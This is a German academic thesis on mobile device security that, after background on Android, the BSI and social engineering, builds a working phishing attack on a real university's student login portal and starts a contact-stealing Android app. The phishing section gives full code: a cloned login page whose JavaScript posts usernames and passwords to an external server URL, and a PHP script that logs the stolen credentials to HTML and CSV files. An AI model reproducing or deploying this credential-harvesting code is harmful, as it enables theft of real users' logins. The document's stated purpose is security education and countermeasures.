IT-Sicherheit mobiler Endgeräte – Angriffsszenarien und Gegenmaßnahmen
1 Einleitung
In der heutigen Gesellschaft ist die IT ein unverzichtbarer Bestandteil der unterschiedlichsten Staats-, Unternehmens- und Lebensbereiche. Der Konkurrenzkampf der wirtschaftlichen Unternehmen untereinander, die versuchen durch die IT sich einen Vorteil auf dem Markt zu verschaffen, oder sich den kurz-und langfristig ändernden komplexen Bedürfnissen der IT-Nutzer anzupassen, ist sehr hoch. Mit der fortschreitenden Technologie werden räumliche und zeitliche Distanzen überwunden, und Händler sind in der Lage über regionale Einzugsbereiche hinaus neue Kunden zu erreichen.
Auch die Bundesbehörden sind von dem Wettbewerbsdruck der rasanten Technologieentwicklung und -nutzung betroffen, denn mit der Globalisierung öffnen sich gleichzeitig Cyber-kriminellen Möglichkeiten bzw. Methoden in neue und breitere Marktsegmente einzusteigen und ebenso eine höhere Anzahl an potentiellen Opfern zu erreichen.
1.1 Motivation
Im Jahr 2014 wurden 49.925 Delikte der Cyberkriminalität erfasst, wohingegen ca. 91 % der Straftaten im Dunkelfeld liegen und somit nicht erfasst werden konnten.1 Die davon verursachten Schadenkosten beliefen sich im selben Jahr auf 39,4 Millionen Euro. Die Dunkelfeldstudie des DIW ergab, dass die jährlichen Schadenskosten durch Cyberkriminalität in Deutschland bei weitem höher ausfallen und sich auf 3,4 Milliarden Euro belaufen.2
Durch die Umstellung auf mobile Endgeräte, welche die Nutzer sowohl privat als auch betrieblich durch zahlreiche Anwendungen unterstützen, hat die IT-Sicherheit besonders in diesem Bereich eine immer weiter zentraler werdende Rolle eingenommen. Die einzelnen Unternehmen und Bundesbehörden versuchen mit dem Wandel stets mitzuhalten um Gefahrenbereiche, Fehler, Störungen und Probleme frühzeitig zu erkennen und schnellstmöglich adäquate Sicherheitsmaßnahmen zu treffen, um potentielle und bereits im Ablauf befindliche Gefahren abzuwehren ggf. Schäden einzugrenzen.
Da sich die Produktentwicklungs- und Lebenszykluszeiten insbesondere im Bereich der mobilen Endgeräte und die Weiterentwicklung von Software (-Updates) sich drastisch verkürzt haben, beginnt der Wettlauf fortlaufend von neuem. Aus diesem Grund ist es überaus wichtig, dass Fachleute aus den Bereichen der (Wirtschafts-) Informatik sich mit den Themen der IT-Sicherheit beschäftigen, um Gefahren entgegenwirken zu können und den ursprünglichen Zwecknutzen der IT (Unterstützung der Nutzer) zu gewährleisten.
1.2 Zielsetzung der Arbeit
Ziel dieser Arbeit war es zunächst die typischen und aktuellen Angriffsszenarien auf mobile Endgeräte zu kategorisieren, zu analysieren, abzubilden und Gegenmaßnahmen zu ermitteln. Im ersten Abschnitt werden die mobilen Endgeräte definiert und die Arbeit auf das Betriebssystem Android eingeschränkt.
Anhand der, in den letzten Jahren von den Bundesbehörden statistisch erfassten Vorfällen wurden zwei Testfälle abgeleitet/ausgewählt.
Mittels unterschiedlichen Programmiersprachen (Javascript, HTML, PHP, Java) und einem extern angebundenen Server, wurden zwei praxisnahe Testszenarien erarbeitet, modelliert und erstellt. Dadurch konnte die Vorgehensweise dargestellt werden, wie der Verlust der persönlichen Daten an unbekannte Dritte abläuft. Die Systemarchitekturen wurden durch die Abbildung einer Netzwerktopologie, und die Prozesse mittels erweiterter Ereignisgesteuerter Prozessketten modelliert. Beide Fallbeispiele basieren auf der Client-Server Architektur. Im Fokus der Arbeit war eine ausführliche Beschreibung der Client-Programmierung und der auf dem Server hinterlegten PHP-Skripte. Die Ausgabe, sowie die grafische Aufbereitung sind ebenfalls mit inbegriffen. Im Kapitel Hotspot werden öffentliche Netzwerke umfassend analysiert, und die Schwächen durch ein Angriffsszenario dargestellt.
Abschließend werden die Gegenmaßnahmen aufgelistet, die die Benutzer anwenden können, um sich vor den aufgezählten Gefahrenbereichen zu schützen.
2 Mobiles Endgerät
Mobile Endgeräte haben sich erfolgreich in die Lebensstandards der privaten Haushalte in Deutschland integriert und sind bereits ein fester Bestandteil eines typischen Warenkorbes. Auch in Unternehmen und Behörden tragen diese Geräte zur Optimierung, Unterstützung und Durchführung einer Vielzahl von Geschäftsprozessen bei, indem sie durch die Mobilität mehr Effizienz und Effektivität verschaffen.
2.1 Definition
Als mobile Endgeräte werden transportable IT-Geräte bezeichnet, welche zur persönlichen Kommunikation, im aktivierten oder empfangsbereitem Zustand3, mit selbständiger Energieversorgung, Kommunikations- und Benutzungs-Schnittstellen4 unabhängig von Räumlichkeiten vernetzt bleiben.5
Abb. 1: Blockbild eines mobilen Endgeräts6
2.2 Benutzungs-Schnittstellen
Die Benutzungs-Schnittstelle beschreibt die Art und Weise der Interaktion zwischen dem Nutzer und dem mobilen Endgerät. Sie ist die Schnittstelle zwischen Mensch und Maschine.7 „Die Mensch-Maschine-Schnittstelle
ist kein abgeschlossener Technologiebereich, sondern eine Querschnittsaufgabe, die unter anderem die Informatik, die Ergonomie, die Kognitionswissenschaften und die Mikroelektronik einbezieht.“8
Beispiele für mobile Endgeräte wären u. a. die Tastatur eines Notebooks oder der Touchscreen-Monitor eines Smartphones/Tablet-PCs.
2.3 Geräte-/Speicher-Schnittstellen
Geräte-Schnittstellen, wie beispielsweise eine USB-Schnittstelle, bieten dem Nutzer die Möglichkeit einer erweiterten Nutzung des Geräts an (s. Abb. 1). Es ist erforderlich, dass ein mobiles Endgerät eine Energieversorgungsschnittstelle vorweist, damit es auch als solches definiert werden kann. Denn erst durch die eigene Energieversorgung ist es möglich, das Gerät unabhängig von Räumlichkeiten zu nutzen. Mobile Endgeräte können auch des weiteren Speicher-Schnittstellen besitzen, um externe Speichermedien anzuschließen (nicht zwingend erforderlich).
2.4 Kommunikationsschnittstellen
Die Kommunikationsschnittstelle ermöglicht es dem IT-Gerät mit externen Hardwaregeräten bzw. Anwendungen, mittels UMTS, Bluetooth, WLAN etc. (s. Abb. 1) zu kommunizieren. Die erwähnte Schnittstelle öffnet gleichzeitig einem Außenstehenden die Möglichkeit, aus beliebiger Entfernung digital mit dem IT- Gerät zu kommunizieren und ggf. Schaden anzurichten oder persönliche Daten abzugreifen. Die Kommunikationsschnittstellen WLAN und Bluetooth werden später als eigenständige Kapitel behandelt.
2.5 Einsatzzweck
Zuletzt wird zwischen dem Einsatzzweck unterschieden. Ein MDE-Gerät (welches in Lebensmittelfilialen für die Datenerfassung eingesetzt wird) oder tragbare Spielekonsolen, fallen somit laut obiger Definition auch in die Kategorie „Mobiles Endgerät“. Cyberangriffe beschränken sich jedoch überwiegend auf Kommunikationsgeräte, bei denen ein großer Datenaustausch von relevanten privaten Informationen stattfindet. In dieser Arbeit werden deshalb die klassischen Hardwaregeräte wie Smartphones und Tablet-PCs untersucht. Diese ermöglichen es auch dem Anwender Apps zu installieren und über unterschiedliche Webbrowser im Internet zu surfen.
2.6 Betriebssysteme
„Definition (Betriebssystem) nach DIN 44300: Die Programme eines digitalen Rechensystem, die zusammen mit den Eigenschaften dieser Rechenanlage die Basis der möglichen Betriebsarten des digitalen Rechensystem bilden und die insbesondere die Abwicklung von Programmen steuern und überwachen.“9
Die Einführung des Iphone (des Unternehmens Apple) im Jahr 2007 mit dem Betriebssystem IOS, löste den Start einer neuen Technologieentwicklungswelle aus. IOS, Android und Windows Phone sind aktuell die meist genutzten Betriebssysteme im Bereich der mobilen Endgeräte (siehe Abb. 2).
Mehrere Betriebssysteme wurden entwickelt und konnten sich langfristig auf dem Markt nicht durchsetzen. Android hingegen, wurde innerhalb kürzester Zeit zum stärksten Konkurrenten und Marktführer in der Branche der mobilen Endgeräte.
Zwei von drei Smartphones, die im Jahr 2012 weltweit verkauft wurden, basierten auf der Plattform des Android Betriebssystems.10 Diese Arbeit beschränkt sich deshalb im weiteren Verlauf auf das quelloffene Betriebssystem Android.
Abb. 2: Marktanteile der Betriebssysteme an der Smartphone-Nutzung in Deutschland von Dezember 2011 bis Februar 201511
2.7 Android (OSS)
Android hat das Ziel, eine offene Plattform für Entwickler zu erstellen, denen die Möglichkeit eingeräumt wird, innovative Anwendungen zu entwickeln und in den plattformeigenen Marktplatz Android Market (Google Play) einzuführen.12
Das Android Betriebssystem ist durch das Unternehmen Google Inc. kostenfrei erhältlich und wird von vielen Umsatzstarken Herstellern als wesentlicher Hauptbestandteil Ihrer Produkte in den Markt etabliert. Der Android Marktplatz (Google Play) gehört, und wird betrieben von dem Unternehmen Google Inc. („Google“). Auf dem Android Marktplatz sind Produkte (definiert als Dateien, Anwendungen, Texte, Software für Mobilfunkgeräte etc.) für Android-gestützte Mobilfunkgeräte erhältlich. Diese Produkte werden von Google oder Drittanbietern, die nicht mit Google verbunden sind, angeboten.13
Als Open Source Software (OSS), wird die Software bezeichnet, welches die Definition der Open Source Initiative (OSI) erfüllt.
In der folgenden Definition sind einige Bedingungen zusammenfassend aufgelistet.
Definition der OSS:
- Software darf uneingeschränkt verbreitet werden, ohne das Gebühren anfallen.14
- Der Quellcode muss verständlich und öffentlich zugänglich sein.15
- Die Software darf für beliebige Zwecke verwendet werden.16
- Software muss Veränderungen und Derivate zulassen und darf unter denselben Lizenzbestimmungen weitervertrieben werden.17
Die Mehrheit der Android Software unterliegt der Apache Software License, welches von der Open Source initiative zugelassen ist. Deshalb wird Android als Open Source Software (quelloffen) bezeichnet.18
3 IT-Sicherheit
„IT-Sicherheit bezeichnet einen Zustand, in dem Risiken, die beim Einsatz von Informationstechnik aufgrund von Bedrohungen und Schwachstellen vorhanden sind, durch angemessene Maßnahmen auf ein tragbares Maß reduziert sind. IT-Sicherheit ist also der Zustand, in dem Vertraulichkeit, Integrität und Verfügbarkeit von Informationen und Informationstechnik durch angemessene Maßnahmen geschützt sind“.19
3.1 Datensicherheit
Benutzer mobiler Endgeräte erwarten bestimmte Sicherheitseigenschaften, Dienste und Leistungen.
Die Daten müssen zur Verfügung stehen bzw. zugreifbar sein, wenn sie benötigt werden (Verfügbarkeit). Informationen sind nur für autorisierte Personen bestimmt und einsehbar (Vertraulichkeit).
Der Autor und Absender einer Nachricht kann nachgewiesen werden. Der Empfänger kann sichergehen von wem die Nachricht stammt (Authentizität) und es ist nachweisbar, dass der Absender die Nachricht versandt hat (Verbindlichkeit). Die Nachricht wurde nicht verändert (Integrität), teilweise verlangen Anwender Anonymität bei gewissen Fällen. Zuletzt die Überwachung der Benutzung von Personen Zugriffkontrolle.20
3.2 BSI
Die Bundesregierung verabschiedete im Jahr 1989 das Zukunftskonzept IT:
„Die Bundesregierung wird dafür sorgen, daß alle Betroffenen und Interessierten über Risiken, Schutzmaßnahmen und das Zusammenwirken verschiedener Stellen (Hersteller, Sicherheitsbehörden, Anwender) unterrichtet werden.“21
Um die wirtschaftliche und staatliche Funktionsfähigkeit zu gewährleisten, mussten Sicherheits- und Präventionsmaßnahmen festgelegt werden. Am 1. Januar 1991 wurde dann das Bundesamt für Sicherheit in der Informationstechnik (BSI) gegründet. Die rasante Entwicklung der Informationstechnik und die zunehmende Abhängigkeit der Gesellschaft von der IT, welches zur Folge von Bedrohungen wie Computerversagen, – missbrauch oder –sabotage hatte, waren die Gründe für solch eine Behörde, die sich mit Themensbereichen der IT-Sicherheit befasst. Die Arbeit des Bundesamtes wurde in fünf Abteilungen (Abteilung B, C, KT, S und Z) kategorisiert und organisiert.22
Abteilung B ist für die Beratung und Unterstützung, Koordination und Steuerung der Informationssicherheit verantwortlich.23
Abteilung C ist für die Sicherheit in Netzen und operative Netzabwehr zuständig.24
Abteilung KT ist für die Vorgaben, Zulassungen, Evaluierung und Betrieb von Kryptosystemen verantwortlich.25
Die Aufgabenbereiche der Abteilung S, ist zum einen die sichere elektronische Identität, und zum anderen die Zertifizierung und Standardisierung.26
Die Abteilung Z sorgt für die „Steuerung und Koordinierung aller zentralen Services, die die Fachabteilungen zur Erledigung ihrer Fachaufgaben benötigen.“27
3.3 Gefahren
Die Benutzung mobiler Endgeräte ist mit unterschiedlichen Arten von Gefährdungen, Bedrohungen und Schwachstellen verbunden.
Abb. 3: Gefährdungspotenziale Mobilfunk28
Während in den Unternehmen und Behörden das IT-Sicherheitsmanagement, Datenschutzrichtlinien und IT-Sicherheitsmaßnahmen bereits feste Bestandteile der Struktur sind, existieren trotzdem weiterhin Gefährdungen, die nicht vollständig verhindert werden können. In der Rubrik „Gefährdungskatalog“ des IT-Grundschutzkatalogs vom BSI werden die Gefahren in elementare Gefährdungen, höhere Gewalt, organisatorische Mängel, menschliche Fehlhandlungen, technisches Versagen und vorsätzliche Handlungen unterteilt.29
Elementare Gefährdungen: Wie bereits aus dem Begriffsnamen zu verstehen ist, werden unter dieser Rubrik, die ausschlaggebenden Gefährdungen zusammengefasst.30
Gefährdungen aufgrund höherer Gewalt: Hierzu zählen Feuer, Wasser, Kabelbrand, Personalausfall, Ausfall von IT-Systemen, Unzulässige Temperatur und Luftfeuchte, Staub, Verschmutzung, Datenverlust durch starke Magnetfelder, Ausfall eines Weitverkehrsnetzes, Technische Katastrophen im Umfeld, Beeinträchtigung durch Großveranstaltungen, Sturm etc.31
Gefährdungen aufgrund organisatorische Mängel: Unzureichende Kontrolle von WLANs, Fehlende oder unzureichende Planung des WLAN-Einsatzes, Unzureichende Regelungen zum WLAN-Einsatz, Unzureichende Kontrolle der Sicherheitsmaßnahmen etc.32
Gefährdungen aufgrund technischen Versagens: Ausfall der Stromversorgung, Verluste gespeicherter Daten, Software-Schwachstellen oder – Fehler, Fehler in verschlüsselten Daten, Unsichere kryptographische Algorithmen etc.
Da diese Arbeit auch die private Nutzung der mobilen Endgeräte und somit die bürgerlichen Anwender mit berücksichtigt werden folgende Themen behandelt:
Gefährdungen aufgrund menschlicher Fehlhandlungen:Fehlbedienungen, Fehlerhafte Nutzung der Endgeräte, Informationsabfluss durch Mitarbeiter über Internetdienste etc.33
Gefährdung aufgrund vorsätzlichen Handelns: Phishing, Diebstahl, Schadsoftware, Viren, Trojaner etc.34
Um an die persönlichen Daten potentieller Opfer zu gelangen, müssen Email-Adressen, Telefonnummern, Anschriften o. ä. einer Person ermittelt werden. Dabei wird auf menschliches Fehlhandeln abgewartet oder dieses sogar provoziert (Social Engineering). Die Kommunikations-, Geräte-, Speicher- und Benutzungsschnittstellen mobiler Endgeräte können dazu verwendet werden, um an Informationen zu gelangen. Es reichen bereits persönliche Teilinformationen, mit denen dann weiter agiert werden kann.
Es existieren bekannte Herangehensweisen, um an persönliche Informationen heranzukommen. Hier werden einige aufgelistet:
- Webseiten (Foren) an denen sich Nutzer registrieren.
- Nutzung eines ungesicherten WLANs (z. B. WLAN-Hotspot)35
- Externe Datenträger (USB-Stick), welches mit einer infizierten Datei (Trojaner) belegt ist, und an das mobile Endgerät angeschlossen wird.
- Durch Schadsoftware werden nicht nur die eigenen Daten an Dritte weitergeleitet, sondern auch die, die im Kontaktverzeichnis oder im Email-Postfach gespeichert sind. Somit besteht jederzeit die Gefahr, als unbeteiligter Dritter vertraute Daten an unbekannte zu verlieren.
- Aufruf einer Internetseite von einem mobilen Gerät aus. So wurde beispielsweise eine Internetseite manipuliert, sodass die Telefonnummer ermittelt wird und der Benutzer ohne Wissen und Einverständniserklärung einen Abo-Vertrag bekommt (wird im Kapitel WAP-Billing näher erläutert).
- Phishing und Social Engineering.
4 Social Engineering
Beim Social Engineering handelt es sich, um die Techniken der zwischenmenschlichen Beeinflussung und Überredungskunst zur Manipulation oder zur Vortäuschung falscher Tatsachen, um ein bestimmtes Verhalten bei Personen hervorzurufen.36 Social Engineering lässt sich sowohl mit technischen, als auch mit nicht-technischen Methoden ausführen.
Bei der Vorgehensweise mit Hilfe der IT kommuniziert der Angreifer ausschließlich auf digitalem Weg mit dem Opfer, und versucht somit Informationen zu beschaffen. In dem Kapitel Phishing wird aufgezeigt, wie solch eine Täuschung erfolgt.37
Bei der nicht-technischen Vorgehensweise steht die direkte zwischenmenschliche Kommunikation im Vordergrund. Die persönlichen Informationen werden durch soziale Annäherung an das Opfer beschafft.
Menschliche Eigenschaften wie Hilfsbereitschaft oder Angst werden in dieser Methodik stark angesprochen. Teilweise wird sogar das Opfer dazu gebracht, den Angreifer von selbst zu kontaktieren und freiwillig die erwünschten Informationen zu übermitteln.38
Fallbeispiel: Person A ruft Person B in der Lebensmittelfiliale an, und gibt sich als Mitarbeiter der betreuenden Sicherheitsfirma aus. Person A behauptet weiterhin, dass mit dem Tresorschloss eine Störung bestehe, und deshalb heute ein Techniker die Filiale anfahren müsse, da sonst am Abend Probleme mit der Scharfschaltung der Filiale auftreten könnten. Somit gelangt Person A, sobald sie die Filiale betritt, ohne Widerstand bis zum Tresor.
5 Phishing
Das Wort „Phishing“ wurde aus den zwei Wörtern „Password“ und „fishing“ abgeleitet. Sie ist eine weitverbreitete Methode, welches Cyber-Kriminelle verwenden, um an vertrauliche Daten der mobilen Anwender, wie Passwörter oder Zugangsdaten zu gelangen. Mittels IT wird versucht sich das Vertrauen des Anwenders zu erschleichen, um ihn anschließend dazu zu verleiten, erwünschte persönliche Daten von selbst preiszugeben.39
- Zunächst wird ein vertrauenswürdiges und seriöses Unternehmen ausgewählt, welches einen hohen Bekanntheitsgrad vorweisen kann, und von einem breiten Spektrum an Nutzern für transaktionale Aktivitäten verwendet wird (z. B. Amazon, Telekom oder Online-Portale von Banken).
- Danach wird eine ähnliche oder exakte Webseite, mit zugehörigen Markenzeichen des jeweiligen Anbieters, und eine Eingabeformular für die erwünschten Informationen nachgeahmt.
- Als letztes wird eine klar formulierte Email mit einem Hyperlink erstellt, die zu der gefälschten Webseite führt, worin der Nutzer aufgefordert wird, seine Daten einzugeben und zu bestätigen. Beispielsweise wird hier der Nutzer aufgefordert, aus „Konto Sicherheitsgründen“ seine Daten für einen Abgleich schnellstmöglich nochmal einzugeben.
5.1 Architektur
Im folgenden Abschnitt werden die Hard- und Softwaretechnischen Aspekte des Phishing abgebildet und erläutert. Durch eine umfassende Funktions- und Prozessanalyse wird der Ablauf modelliert. Abschließend wird durch ein praxisnahes Fallbeispiel ein Phishing Cyber-Angriff nachgestellt. Dazu wurde das online Service Portal der HSNR als Testobjekt ausgewählt. Die Programmiercodes und die dafür verwendeten Software-Tools werden aufgezählt/angegeben. Die verwendeten Methoden und Funktionen (Programmiercodes) werden ebenfalls ganzheitlich beschrieben und erläutert.
5.1.1 Netzwerktopologie
In folgender Abbildung wird die Client-Server Architektur als ein abstraktes Netzwerkmodell dargestellt (s. Abb. 4). Sie zeigt die Struktur und Verbindung der Hardwaregeräte an. Aus der Netzwerktopologie wird abgeleitet, wie die Hardwaregeräte miteinander agieren.
Abb. 4: Netzwerktopologie Phishing40
- Der Absender greift auf die gefälschte Internetseite mittels eines Internet-Browsers zu, und trägt seine Daten im Client-Gerät in das Formular ein.
- Sobald der Absender die eingegebenen Daten bestätigt, werden die Daten in CSV Werte konvertiert und mittels Internetverbindung durch einen Post Request zum Server versendet.
- Nach der Verarbeitung der empfangenen Daten werden diese als CSV-Datei und HTML-Dokument am selben Server hinterlegt.
- Um auf das erstellte HTML-Dokument zuzugreifen, muss sich der Empfänger mittels eines Browsers und Internetverbindung den Hyperlink des HTML-Dokuments aufrufen (kein Speicher des verwendeten IT-Gerätes notwendig). Der Empfänger kann die CSV-Datei mittels eines Browsers und einer Internetverbindung herunterladen, indem er den Hyperlink der CSV-Datei aufruft. Bei der CSV-Datei wird zusätzlich freier Speicher vorausgesetzt, um diese zu speichern und im Nachhinein durch eine Software (z. B. Excel) öffnen zu können.
5.1.2 (Funktions- und) Prozessanalyse
Um den genauen Prozessablauf zu modellieren, analysieren und graphisch darzustellen, fiel die Auswahl auf die Erweiterte ereignisgesteuerte Prozesskette (eEpk).Der Prozess des Phishings setzt sich aus zwei zusammenhängenden Teilen in festgelegter Reihenfolge zusammen. Im ersten Teil wird der Anwender zu der Webseite gelockt. Hierzu wird die Interaktion mittels einer Nachricht (z. B. Email oder SMS) genutzt. Danach werden die Daten des Anwenders abgegriffen und an den Server weitergeleitet. Im zweiten Teil werden die Daten im Server verarbeitet.
5.1.1.1 Prozess 1: Client
Abb. 5: Phishing Prozessabbildung Client41
5.1.1.2 Prozess 2: Server
Abb. 6: Phishing Prozessabbildung Server42
5.2 Realisierung
Entwicklungsumgebung: Notepad++
Programmiersprachen: Javascript, Html, Php
Server: Ein externer Server von dem Anbieter Bplaced
Weitere Software-Tools: Google Chrome Webbrowser, FileZilla, Microsoft Office Excel 2007, Text editor
Hardwaregeräte: Laptop mit dem Betriebssystem Windows 7
Ziel: Das Eingangsportal (Online-Service) der Studenten der Hochschule Niederrhein soll manipuliert werden, sodass persönliche Daten abgegriffen und eingesehen werden können.
5.2.1 HTML-Skript
Über Google Chrome wird zunächst die Internetseite des Online-Services aufgerufen. Durch die Option „Seite Speichern unter…“ wird die Internetseite mit all seinem HTML-Code und dazugehörigen Bildern heruntergeladen und auf dem Desktop abgespeichert.
5.2.1.1 Funktionsmethode
Anschließend wird das abgespeicherte HTML-Dokument (Hochschule Niederrhein.html) im Programm Notepad++ geöffnet.
Nun wird die Struktur und Aufbau der Internetseite untersucht. In den Zeilen von 136 – 144 ist erkennbar, dass hier die Textfelder des Formulars Implementiert sind.
Abb. 7: Hochschule Niederrhein.html43
Die 144. Zeile wird nun mit einer Funktion belegt, in dem die folgenden fett markierte Zeilen ergänzt werden:
<input <button onclick=“myFunction()“ id=“ahmet“ class=“submit“ type=“submit“ name=“submit“ value=“Bestätigen“ tabindex=“3″ alt=“Anmelden“></button></li>
Weitere Code Ergänzung erfolgt nun in der Javascript-Sprache. Jede Code-Zeile welche in Javascript programmiert wird, muss zwischen den Begriffen <script> und </script> eingefügt werden.
Es werden drei Variablen definiert:
var Benutzername;
var Passwort;
var Ergebnis;
Im Nächsten Schritt wird nun die Funktion (myFunction) erstellt, welches wir im vorherigen Schritt in die 144. Zeile implementiert hatten. Sie soll die in den Eingabefeldern (Benutzerkennung und Passwort) eingegebenen Werte in die von uns definierten variablen übergeben, und anschließend nach einer gewünschten Syntax in die Variable Ergebnis speichern. Auf die Benutzerkennung wird anhand der id zugegriffen, welches in der Zeile 137 (s. Abb. 6) als „asdf“ definiert wurde. Genauso wird auf anhand der id, auf das Passwort zugegriffen, welches in der Zeile 140 (s. Abb. 6) als „fdsa“ definiert wurde.
function myFunction() {
Benutzername = document.getElementById(„asdf“).value;
Passwort = document.getElementById(„fdsa“).value;
Ergebnis = „Benutzername:“ + Benutzername + “ , „+ „Passwort:“ + Passwort;
5.2.1.2 Ajax
Ajax (Asynchonous Javacript And eXtensible Markup Language) ermöglicht die Datenübertragung zwischen Webserver und Internetbrowser, ohne die Notwendigkeit, die komplette Internetseite von neuem laden zu müssen.44
Folgende Zeile muss an den Header-Bereich des HTML-Codes eingefügt werden, um Ajax anwenden zu können:
<script src=“//ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js“></script>
Darauffolgend wird durch Ajax, mittels http-Post der Wert in der Variable „Ergebnis“ zum Server übertragen und der PHP-Datei (server.php), welches auf dem Server hinterlegt ist, übergeben. Zusätzlich öffnet sich ein Pop-up Fenster mit der Aufschrift „Bestätigung erfolgreich!“, sobald die Datenübertragung erfolgreich war. Der Ajax Code wird noch in eine If-Else-Anweisung mit eingeschlossen und wird nur dann ausgeführt, wenn die Felder Benutzername und Passwort nicht leer sind. Sollten die Felder nicht ausgefüllt sein, öffnet sich ein Pop-up Fenster mit der Anweisung die Felder auszufüllen. Sollten die Felder Zeichen enthalten, so öffnet sich ein Pop-up Fenster mit der Inschrift „Bestätigung erfolgreich“.
if (Benutzername == „“ || Passwort == „“){
alert(„Bitte Felder ausfüllen“);
}
else {
$.ajax({
type: ‚POST‘,
data: {message: Ergebnis},
url: „http://ahisi001.bplaced.net/hsnr/server.php“,
method: ‚POST‘,
success: function(msg) {
alert(„Bestätigung erfolgreich!“);}
});
}
Zuletzt werden die Textfelder des Formulars zurückgesetzt, um dem Anwender zu verdeutlichen, dass der Vorgang abgeschlossen ist.
Benutzername = document.getElementById(„asdf“).value = „“;
Passwort = document.getElementById(„fdsa“).value = „“;
}
5.2.2 PHP-Skript
Die Funktion des PHP-Skripts ist es, die vom Client versendeten Daten zu empfangen und zu verarbeiten:
<?php
// Empfängt die variable „message“ von der Phishing-Seite.
$message=$_POST[„message“];
//Erstellt ein HTML-Dokument, in der die variablen gespeichert werden.
$filename=“Phishing.html“;
// Schreibt die Daten in die Phishing.html Internetseite
file_put_contents($filename,$message.“<br />“,FILE_APPEND);
// ladet den Inhalt des Files zu einer Variablen
$phishingmessages=file_get_contents($filename);
// zeigt den Inhalt der Variable an.
echo $phishingmessages;
// erstellt eine CSV-Datei falls keiner vorhanden ist. Ansonsten werden die //empfangenen Daten an das Ende der bereits bestehenden CSV-Datei angehängt.
$daten = array($message);
$fp = fopen(‚daten.csv‘, ‚a‘);
fputcsv($fp, $daten);
fclose($fp);
?>
Abschließend werden das PHP-Dokument und die manipulierte Internetseite mit Hilfe eines FTP-Clients auf den Server übertragen. Zur Übertragung wurde hier die Software Filezilla genutzt.
5.2.3 Fallbeispiel
Der Student Max Mustermann mit der Benutzerkennung „Mamus001“ und dem Kennwort „Muster123“, ist ein Student der HSNR. An seiner Hochschul- Email-Adresse sieht er eine ungelesene Email. Die Email ist laut Absenderanschrift und dem Inhalt von der Studienleitung, welche alle Studenten bittet Ihre Studenten-Accounts über den unten angegebenen Link zu bestätigen.
http://ahisi001.bplaced.net/hsnr/Hochschule%20Niederrhein.php
Max ruft die Internetseite auf und ist in der gewohnten Anmelde-Maske, die er immer nutzt. Er trägt seinen Benutzernamen und sein Kennwort ein und Bestätigt diesen. Er erhält eine Meldung, dass die Bestätigung erfolgreich war.
Person B ruft die Internetseite http://ahisi001.bplaced.net/hsnr/Phishing.html mittels eines Browsers auf, und kann die eingegebenen Daten einsehen (s. Abb.7).
Abb. 8: Phishing-HTML Dokument45
Es kann zusätzlich die CSV-Datei heruntergeladen werden, um die Dateien abzuspeichern und ohne Internetverbindung ansehen zu können. Die CSV-Datei kann/wird mit der Software Microsoft Office Excel 2007 geöffnet und unter den Einstellungen Daten>Text in Spalten>Getrennt>Trennzeichen Komma in separate Spalten aufgeteilt. Die beschriebene Methodik kann nun wiederholt für unterschiedliche Fälle angewandt werden. Besonders im Online-Banking ist eine Zunahme der Fallzahlen zu erkennen. Im Jahr 2014 wurden dem Bundeskriminalamt 6.984 Fälle des Phishings gemeldet.46
6 Schadsoftware
Es existieren vielfältige varianten im Zusammenhang mit dem Begriff Schadsoftware. Im darauf folgenden Abschnitt wird eine Schadsoftware modelliert und erstellt, um somit einen Einblick darstellen zu können, wie sich diese auswirkt.
Das Ziel war es eine Android App zu programmieren, welches die persönlichen Daten eines Anwenders abgreift, ohne dass dieser es bemerkt.
6.1 Architektur
Um die Android App zu modellieren, wurde zunächst die Netzwerktopologie abgebildet und anschließend durch die Erweiterte Ereignisgesteuerte Prozesskette modelliert. Anschließend wird die Realisierung detailliert und sequentiell abgearbeitet.
6.1.1 Netzwerktopologie
In folgender Abbildung wird die Client-Server Architektur der Android App als ein abstraktes Netzwerkmodell angezeigt (s. Abb. 9).
Abb. 9: Netzwerktopologie App47
- Die Prozesskette wird in Gang gesetzt, sobald der Absender die fertiggestellte Android App startet.
- Die App liest sich die Kontaktdaten aus dem Kontaktverzeichniss des mobilen Endgeräts raus, konvertiert diese in CSV Werte und übermittelt diese über eine bestehende Internetverbindung mittels einem http Post request an den Server.
- Der Server empfängt den Datenstrom und erstellt zunächst eine CSV-Datei (falls keine vorhanden ist). Die empfangenen Daten werden dann ans Ende der CSV-Datei angehängt.
- Ab da an ist der Empfänger jederzeit in der Lage, die CSV-Datei vom Server herunterzuladen und einzusehen.
6.1.2 (Funktions- und) Prozessanalyse
Die Android App wurde mit Hilfe einer eEpk modelliert. Als erstes wurde die Client-Perspektive dargestellt, in der der Empfänger die App startet und darauffolgend die Server-Perspektive in der die Daten Empfangen und verarbeitet werden.
6.1.2.1 Prozess 1: Client
Abb. 10: App-Client Prozessabbildung48
6.1.2.2 Prozess 2: Server
Abb. 11: App-Server Prozessabbildung49
6.2 Realisierung
Entwicklungsumgebung: Eclipse mit ADT-Plugin und SDK Manager
Programmiersprachen: Java (Android), XML, PHP
Server: Ein externer Server von dem Anbieter Bplaced
Weitere Software-Tools: Webbrowser, FileZilla, Microsoft Office Excel 2007, Texteditor
Hardwaregeräte: Laptop mit dem Betriebssystem Windows 7, Samsung Galaxy S5
Ziel: Eine Android basierte App, welches beim Starten im Hintergrund auf die Kontaktdaten (Vorname, Name, Telefonnummer und Email-Adresse) des Anwenders zugreift, und diese an den Server übermittelt. Vom Server werden die Daten als CSV-Datei heruntergeladen und mit Microsoft Excel 2007 geöffnet.
6.2.2 Client-App
Es wird ein neues Android Application Projekt mit der Beschriftung Datacatch4 angelegt. Datacatch4 ist auch somit gleichzeitig der Name der zu erstellenden App. Die App soll ab dem API Level 14 laufen.
6.2.2.1 Layout
Da der Schwerpunkt darauf angelegt ist, was im Hintergrund abläuft, wurde im Layout nicht viel verändert. Im Verzeichnisverlauf unter res/layout/activity_main.xml wurde das Layout bearbeitet, welches später die Benutzerschnittstelle darstellt. Die Basis Theme „AppTheme“ wurde nicht verändert.
Folgende TextView wird später anzeigen, ob eine Internetverbindung besteht oder nicht.
<TextView
android:id=„@+id/tvIsConnected“
android:layout_width=„wrap_content“
android:layout_height=„wrap_content“
android:layout_alignParentTop=„true“
android:layout_centerHorizontal=„true“
android:background=„#FF0000“
android:text=„keine Verbindung!“
android:textColor=„#FFF“
android:textSize=„18dp“ />
Folgende TextView soll nur den Text „Hello World“ ausgeben.
<TextView
android:id=„@+id/liste2“
android:layout_width=„wrap_content“
android:layout_height=„wrap_content“
android:layout_below=„@+id/tvIsConnected“
android:layout_centerHorizontal=„true“
android:layout_marginTop=„92dp“
android:text=„Hello World“
android:textAppearance=„?android:attr/textAppearanceLarge“ />
